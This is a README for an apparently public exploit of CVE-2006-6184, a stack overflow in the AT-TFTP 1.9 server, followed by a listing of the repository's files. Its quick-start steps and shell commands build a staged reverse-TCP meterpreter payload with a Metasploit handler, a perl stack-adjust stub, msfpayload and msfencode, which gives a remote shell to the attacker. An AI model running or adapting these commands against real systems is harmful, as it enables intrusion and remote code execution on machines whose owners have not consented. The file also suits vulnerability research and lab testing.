simplified version of https://github.com/shauntdergrigorian/cve-2006-6184# CVE-2006-6184
This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allowing remote attackers to cause a denial of service or execute arbitrary code.
### Quick Start
0. let exploit/multi/handler listening
1. python generate.py LHOST LPORT PAYLOAD RHOST RPORT (PAYLOAD example: windows/meterpreter/reverse_nonx_tcp)
2. happy coding (maybe migrate process first(?))
#### SKIDDIES BEWARE!
You didn't think it'd be that easy did you?
The payload must be customized to include your own IP address and listening port, so you'll need to generate it yourself.
To do so, use the following steps:
1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):
```sh
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
```
2.) Next, use the following command to create a staged meterpreter shell payload:
```sh
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
```
3.) Then, combine the two files you just created.
```sh
cat stackadj payload > shellcode
```
4.) Finally, let's eliminate the bad characters.
```sh
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
```
Enter the output as the value of the "payload" variable.
[4.0K] /data/pocs/08d10ac5aa0651b719f6f6e1da889a6387f5888f
├── [2.5K] atftp.py
├── [1.1K] generate.py
└── [1.3K] README.md
0 directories, 3 files